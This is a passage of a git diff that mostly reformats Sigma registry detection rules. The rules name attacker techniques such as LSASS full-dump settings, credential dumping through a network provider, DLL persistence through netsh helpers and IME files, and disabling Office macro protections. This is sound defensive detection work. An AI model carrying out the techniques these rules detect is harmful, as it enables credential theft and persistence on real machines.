b/sigma/builtin/registry/registry_set/registry_set_hide_file.yml index c7fc33fa7..cb5321b67 100644 --- a/sigma/builtin/registry/registry_set/registry_set_hide_file.yml +++ b/sigma/builtin/registry/registry_set/registry_set_hide_file.yml @@ -1,8 +1,7 @@ title: Modification of Explorer Hidden Keys id: 5a5152f1-463f-436b-b2f5-8eceb3964b42 status: experimental -description: Detects modifications to the hidden files keys in registry. This technique - is abused by several malware families to hide their files from normal users. +description: Detects modifications to the hidden files keys in registry. This technique is abused by several malware families to hide their files from normal users. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml b/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml index cf7c40682..f60cf9178 100644 --- a/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml +++ b/sigma/builtin/registry/registry_set/registry_set_hide_function_user.yml @@ -1,8 +1,7 @@ title: Registry Hide Function from User id: 5a93eb65-dffa-4543-b761-94aa60098fb6 status: test -description: Detects registry modifications that hide internal tools or functions - from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) +description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml index 0a6d6e656..6760950ca 100644 --- a/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml @@ -1,18 +1,14 @@ title: Hide Schedule Task Via Index Value Tamper id: 5b16df71-8615-4f7f-ac9b-6c43c0509e61 related: - - id: acd74772-5f88-45c7-956b-6a7b36c294d2 - type: similar - - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec - type: similar + - id: acd74772-5f88-45c7-956b-6a7b36c294d2 + type: similar + - id: 526cc8bc-1cdc-48ad-8b26-f19bff969cec + type: similar status: experimental -description: 'Detects when the "index" value of a scheduled task is modified from - the registry - - Which effectively hides it from any tooling such as "schtasks /query" (Read the - referenced link for more information about the effects of this technique) - - ' +description: | + Detects when the "index" value of a scheduled task is modified from the registry + Which effectively hides it from any tooling such as "schtasks /query" (Read the referenced link for more information about the effects of this technique) references: - https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml b/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml index 6909b35a6..44dac929e 100644 --- a/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml +++ b/sigma/builtin/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml @@ -1,15 +1,11 @@ title: IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols id: 3fd4c8d7-8362-4557-a8e6-83b29cc0d724 related: - - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 - type: similar + - id: 10344bb3-7f65-46c2-b915-2d00d47be5b0 + type: similar status: experimental -description: 'Detects changes to Internet Explorer''s (IE / Windows Internet properties) - ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My - Computer" zone. This allows downloaded files from the Internet to be granted the - same level of trust as files stored locally. - - ' +description: | + Detects changes to Internet Explorer's (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally. references: - https://twitter.com/M_haggis/status/1699056847154725107 - https://twitter.com/JAMESWT_MHT/status/1699042827261391247 diff --git a/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml b/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml index 463596e44..672a919c6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml +++ b/sigma/builtin/registry/registry_set/registry_set_ime_non_default_extension.yml @@ -1,21 +1,13 @@ title: Uncommon Extension In Keyboard Layout IME File Registry Value id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 related: - - id: 9d8f9bb8-01af-4e15-a3a2-349071530530 - type: derived + - id: 9d8f9bb8-01af-4e15-a3a2-349071530530 + type: derived status: experimental -description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature, - which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST - message. - - Before doing this, the client needs to register the DLL in a special registry - key that is assumed to implement this keyboard layout. This registry key should - store a value named "Ime File" with a DLL path. - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. - - ' +description: | + Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. + Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. + IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. references: - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ author: X__Junior (Nextron Systems) @@ -38,7 +30,6 @@ detection: NewValue|endswith: .ime condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. + - IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. level: high ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml b/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml index ed9f313bf..83561bc0c 100644 --- a/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml +++ b/sigma/builtin/registry/registry_set/registry_set_ime_suspicious_paths.yml @@ -1,21 +1,13 @@ title: Suspicious Path In Keyboard Layout IME File Registry Value id: 9d8f9bb8-01af-4e15-a3a2-349071530530 related: - - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 - type: derived + - id: b888e3f2-224d-4435-b00b-9dd66e9ea1f1 + type: derived status: experimental -description: 'Detects usage of Windows Input Method Editor (IME) keyboard layout feature, - which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST - message. - - Before doing this, the client needs to register the DLL in a special registry - key that is assumed to implement this keyboard layout. This registry key should - store a value named "Ime File" with a DLL path. - - IMEs are essential for languages that have more characters than can be represented - on a standard keyboard, such as Chinese, Japanese, and Korean. - - ' +description: | + Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. + Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. + IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean. references: - https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/ author: X__Junior (Nextron Systems) @@ -43,15 +35,15 @@ detection: - \AppData\Roaming\ - \Temporary Internet selection_folders_2: - - NewValue|contains|all: - - :\Users\ - - \Favorites\ - - NewValue|contains|all: - - :\Users\ - - \Favourites\ - - NewValue|contains|all: - - :\Users\ - - \Contacts\ + - NewValue|contains|all: + - :\Users\ + - \Favorites\ + - NewValue|contains|all: + - :\Users\ + - \Favourites\ + - NewValue|contains|all: + - :\Users\ + - \Contacts\ condition: registry_set and (selection_registry and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml b/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml index f3f0593bd..5d5705cfa 100644 --- a/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml +++ b/sigma/builtin/registry/registry_set/registry_set_install_root_or_ca_certificat.yml @@ -1,8 +1,7 @@ title: New Root or CA or AuthRoot Certificate to Store id: d223b46b-5621-4037-88fe-fda32eead684 status: experimental -description: Detects the addition of new root, CA or AuthRoot certificates to the - Windows registry +description: Detects the addition of new root, CA or AuthRoot certificates to the Windows registry references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store - https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec diff --git a/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml b/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml index 8fb2a3939..321696ee7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml +++ b/sigma/builtin/registry/registry_set/registry_set_internet_explorer_disable_first_run_customize.yml @@ -1,11 +1,8 @@ title: Internet Explorer DisableFirstRunCustomize Enabled id: ab567429-1dfb-4674-b6d2-979fd2f9d125 status: experimental -description: 'Detects changes to the Internet Explorer "DisableFirstRunCustomize" - value, which prevents Internet Explorer from running the first run wizard the - first time a user starts the browser after installing Internet Explorer or Windows. - - ' +description: | + Detects changes to the Internet Explorer "DisableFirstRunCustomize" value, which prevents Internet Explorer from running the first run wizard the first time a user starts the browser after installing Internet Explorer or Windows. references: - https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf - https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/ @@ -25,15 +22,14 @@ detection: selection: ObjectName|endswith: \Microsoft\Internet Explorer\Main\DisableFirstRunCustomize NewValue: - - DWORD (0x00000001) - - DWORD (0x00000002) + - DWORD (0x00000001) # Home Page + - DWORD (0x00000002) # Welcome To IE filter_main_generic: ProcessName: - C:\Windows\explorer.exe - C:\Windows\System32\ie4uinit.exe condition: registry_set and (selection and not 1 of filter_main_*) falsepositives: - - As this is controlled by group policy as well as user settings. Some false positives - may occur. + - As this is controlled by group policy as well as user settings. Some false positives may occur. level: medium ruletype: Sigma diff --git a/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml b/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml index 69d006ca5..ff0b317b2 100644 --- a/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml +++ b/sigma/builtin/registry/registry_set/registry_set_legalnotice_susp_message.yml @@ -1,9 +1,7 @@ title: Potential Ransomware Activity Using LegalNotice Message id: 8b9606c9-28be-4a38-b146-0e313cc232c1 status: experimental -description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry - values where the message set contains keywords often used in ransomware ransom - messages +description: Detect changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1491.001/T1491.001.md author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml b/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml index 1e483c90e..756ecef07 100644 --- a/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml +++ b/sigma/builtin/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml @@ -1,13 +1,9 @@ title: Lolbas OneDriveStandaloneUpdater.exe Proxy Download id: 3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d status: experimental -description: 'Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download - a file from the Internet without executing any - - anomalous executables with suspicious arguments. The downloaded file will be in - C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json - - ' +description: | + Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any + anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json references: - https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/ author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml b/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml index 99ed2bbdd..1b3bb8560 100644 --- a/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml +++ b/sigma/builtin/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml @@ -1,19 +1,13 @@ title: RestrictedAdminMode Registry Value Tampering id: d6ce7ebd-260b-4323-9768-a9631c8d4db2 related: - - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 - type: similar + - id: 28ac00d6-22d9-4a3c-927f-bbd770104573 # process_creation + type: similar status: experimental -description: 'Detects changes to the "DisableRestrictedAdmin" registry value in order - to disable or enable RestrictedAdmin mode. - - RestrictedAdmin mode prevents the transmission of reusable credentials to the - remote system to which you connect using Remote Desktop. - - This prevents your credentials from being harvested during the initial connection - process if the remote server has been compromise - - ' +description: | + Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. + RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. + This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise references: - https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md - https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx diff --git a/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml b/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml index e20e2a457..4d65917b6 100644 --- a/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml +++ b/sigma/builtin/registry/registry_set/registry_set_lsass_usermode_dumping.yml @@ -1,9 +1,7 @@ title: Lsass Full Dump Request Via DumpType Registry Settings id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f719 status: experimental -description: Detects the setting of the "DumpType" registry value to "2" which stands - for a "Full Dump". Technique such as LSASS Shtinkering requires this value to - be "2" in order to dump LSASS. +description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. references: - https://github.com/deepinstinct/Lsass-Shtinkering - https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps diff --git a/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml b/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml index 5a7382276..6d388ac3b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml +++ b/sigma/builtin/registry/registry_set/registry_set_mal_adwind.yml @@ -1,8 +1,8 @@ title: Adwind RAT / JRAT - Registry id: 42f0e038-767e-4b85-9d96-2c6335bad0b5 related: - - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 - type: derived + - id: 1fac1481-2dbc-48b2-9096-753c49b4ec71 + type: derived status: experimental description: Detects javaw.exe in AppData folder as used by Adwind / JRAT references: diff --git a/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml b/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml index 9d350cd47..4f94a3a34 100644 --- a/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml +++ b/sigma/builtin/registry/registry_set/registry_set_mal_blue_mockingbird.yml @@ -1,8 +1,8 @@ title: Blue Mockingbird - Registry id: 92b0b372-a939-44ed-a11b-5136cf680e27 related: - - id: c3198a27-23a0-4c2c-af19-e5328d49680e - type: derived + - id: c3198a27-23a0-4c2c-af19-e5328d49680e + type: derived status: experimental description: Attempts to detect system changes made by Blue Mockingbird references: diff --git a/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml b/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml index ad6a5f1e7..db50de5e4 100644 --- a/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml +++ b/sigma/builtin/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml @@ -1,17 +1,10 @@ title: NET NGenAssemblyUsageLog Registry Key Tamper id: 28036918-04d3-423d-91c0-55ecf99fb892 status: experimental -description: 'Detects changes to the NGenAssemblyUsageLog registry key. - - .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog - CLR configuration knob in the Registry or by configuring an environment variable - (as described in the next section). - - By simplify specifying an arbitrary value (e.g. fake output location or junk data) - for the expected value, a Usage Log file for the .NET execution context will not - be created. - - ' +description: | + Detects changes to the NGenAssemblyUsageLog registry key. + .NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section). + By simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created. references: - https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/ author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml b/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml index 816dbe3ab..110f5a6f4 100644 --- a/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml +++ b/sigma/builtin/registry/registry_set/registry_set_netsh_help_dll_persistence_susp_location.yml @@ -1,16 +1,13 @@ title: New Netsh Helper DLL Registered From A Suspicious Location id: e7b18879-676e-4a0e-ae18-27039185a8e7 related: - - id: 56321594-9087-49d9-bf10-524fe8479452 - type: similar - - id: c90362e0-2df3-4e61-94fe-b37615814cb1 - type: similar + - id: 56321594-9087-49d9-bf10-524fe8479452 + type: similar + - id: c90362e0-2df3-4e61-94fe-b37615814cb1 + type: similar status: experimental -description: 'Detects changes to the Netsh registry key to add a new DLL value that - is located on a suspicious location. This change might be an indication of a potential - persistence attempt by adding a malicious Netsh helper - - ' +description: | + Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper references: - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ @@ -36,18 +33,18 @@ detection: - \AppData\Local\Temp\ - \Temporary Internet selection_folders_2: - - NewValue|contains|all: - - :\Users\ - - \Favorites\ - - NewValue|contains|all: - - :\Users\ - - \Favourites\ - - NewValue|contains|all: - - :\Users\ - - \Contacts\ - - NewValue|contains|all: - - :\Users\ - - \Pictures\ + - NewValue|contains|all: + - :\Users\ + - \Favorites\ + - NewValue|contains|all: + - :\Users\ + - \Favourites\ + - NewValue|contains|all: + - :\Users\ + - \Contacts\ + - NewValue|contains|all: + - :\Users\ + - \Pictures\ condition: registry_set and (selection_target and 1 of selection_folders_*) falsepositives: - Unknown diff --git a/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml b/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml index f3daa3b4c..54f218f29 100644 --- a/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml +++ b/sigma/builtin/registry/registry_set/registry_set_netsh_helper_dll_potential_persistence.yml @@ -1,16 +1,13 @@ title: Potential Persistence Via Netsh Helper DLL - Registry id: c90362e0-2df3-4e61-94fe-b37615814cb1 related: - - id: 56321594-9087-49d9-bf10-524fe8479452 - type: similar - - id: e7b18879-676e-4a0e-ae18-27039185a8e7 - type: similar + - id: 56321594-9087-49d9-bf10-524fe8479452 + type: similar + - id: e7b18879-676e-4a0e-ae18-27039185a8e7 + type: similar status: experimental -description: 'Detects changes to the Netsh registry key to add a new DLL value. This - change might be an indication of a potential persistence attempt by adding a malicious - Netsh helper - - ' +description: | + Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper references: - https://www.ired.team/offensive-security/persistence/t1128-netsh-helper-dll - https://pentestlab.blog/2019/10/29/persistence-netsh-helper-dll/ diff --git a/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml b/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml index c97b520da..41c692d72 100644 --- a/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml +++ b/sigma/builtin/registry/registry_set/registry_set_new_application_appcompat.yml @@ -1,8 +1,7 @@ title: New Application in AppCompat id: 60936b49-fca0-4f32-993d-7415edcf9a5d status: test -description: A General detection for a new application in AppCompat. This indicates - an application executing for the first time on an endpoint. +description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/1 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.md @@ -23,8 +22,7 @@ detection: ObjectName|contains: \AppCompatFlags\Compatibility Assistant\Store\ condition: registry_set and selection falsepositives: - - This rule is to explore new applications on an endpoint. False positives depends - on the organization. + - This rule is to explore new applications on an endpoint. False positives depends on the organization. - Newly setup system. - Legitimate installation of new application. level: informational diff --git a/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml b/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml index 8da2b65bf..d51aa9785 100644 --- a/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml +++ b/sigma/builtin/registry/registry_set/registry_set_new_network_provider.yml @@ -1,11 +1,10 @@ title: Potential Credential Dumping Attempt Using New NetworkProvider - REG id: 0442defa-b4a2-41c9-ae2c-ea7042fc4701 related: - - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 - type: similar + - id: baef1ec6-2ca9-47a3-97cc-4cf2bda10b77 + type: similar status: experimental -description: Detects when an attacker tries to add a new network provider in order - to dump clear text credentials, similar to how the NPPSpy tool does it +description: Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it references: - https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade - https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy diff --git a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml index 7b38c87a8..029c71b1d 100644 --- a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml +++ b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered.yml @@ -30,8 +30,7 @@ detection: ObjectName|contains: \Microsoft Excel Driver NewValue|startswith: C:\Progra NewValue|endswith: \ACEODBC.DLL - condition: registry_set and (selection and not 1 of filter_main_* and not 1 of - filter_optional_*) + condition: registry_set and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Likely level: low diff --git a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml index 6f7921704..a91b935e9 100644 --- a/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml +++ b/sigma/builtin/registry/registry_set/registry_set_odbc_driver_registered_susp.yml @@ -1,8 +1,7 @@ title: Potentially Suspicious ODBC Driver Registered id: e4d22291-f3d5-4b78-9a0c-a1fbaf32a6a4 status: experimental -description: Detects the registration of a new ODBC driver where the driver is located - in a potentially suspicious location +description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location references: - https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/ author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml b/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml index 7c266350c..be91c454e 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_access_vbom_tamper.yml @@ -1,12 +1,10 @@ title: Trust Access Disable For VBApplications id: 1a5c46e9-f32f-42f7-b2bc-6e9084db7fbf related: - - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd - type: obsoletes + - id: a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd + type: obsoletes status: test -description: Detects registry changes to Microsoft Office "AccessVBOM" to a value - of "1" which disables trust access for VBA on the victim machine and lets attackers - execute malicious macros without any Microsoft Office warnings. +description: Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings. references: - https://twitter.com/inversecos/status/1494174785621819397 - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/ diff --git a/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml b/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml index 2b0a8579e..bdc3d55d7 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_disable_protected_view_features.yml @@ -1,11 +1,10 @@ title: Microsoft Office Protected View Disabled id: a5c7a43f-6009-4a8c-80c5-32abf1c53ecc related: - - id: 7c637634-c95d-4bbf-b26c-a82510874b34 - type: obsoletes + - id: 7c637634-c95d-4bbf-b26c-a82510874b34 + type: obsoletes status: test -description: Detects changes to Microsoft Office protected view registry keys with - which the attacker disables this feature. +description: Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md - https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/ diff --git a/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml b/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml index 0e3bc97f7..164f19d4b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_enable_dde.yml @@ -1,8 +1,7 @@ title: Enable Microsoft Dynamic Data Exchange id: 63647769-326d-4dde-a419-b925cc0caf42 status: test -description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions - of Microsoft Word or Excel. +description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel. references: - https://msrc.microsoft.com/update-guide/vulnerability/ADV170021 author: frack113 diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml index 045531046..f53798c9b 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_load_macro_provider_on_boot.yml @@ -1,8 +1,7 @@ title: Potential Persistence Via Outlook LoadMacroProviderOnBoot Setting id: 396ae3eb-4174-4b9b-880e-dc0364d78a19 status: experimental -description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" - which if enabled allows the automatic loading of any configured VBA project/module +description: Detects the modification of Outlook setting "LoadMacroProviderOnBoot" which if enabled allows the automatic loading of any configured VBA project/module references: - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 - https://www.linkedin.com/pulse/outlook-backdoor-using-vba-samir-b-/ diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml index 08751290a..8c1c3bf74 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml @@ -1,8 +1,7 @@ title: Outlook Macro Execution Without Warning Setting Enabled id: e3b50fa5-3c3f-444e-937b-0a99d33731cd status: test -description: Detects the modification of Outlook security setting to allow unprompted - execution of macros. +description: Detects the modification of Outlook security setting to allow unprompted execution of macros. references: - https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53 diff --git a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml index a9fdbf008..2ab1850cc 100644 --- a/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml +++ b/sigma/builtin/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml @@ -1,13 +1,12 @@ title: Outlook EnableUnsafeClientMailRules Setting Enabled - Registry id: 6763c6c8-bd01-4687-bc8d-4fa52cf8ba08 related: - - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a - type: similar - - id: 55f0a3a1-846e-40eb-8273-677371b8d912 - type: similar + - id: c3cefdf4-6703-4e1c-bad8-bf422fc5015a + type: similar + - id: 55f0a3a1-846e-40eb-8273-677371b8d912 # ProcCreation variation + type: similar status: experimental -description: Detects an attacker trying to enable the outlook security setting 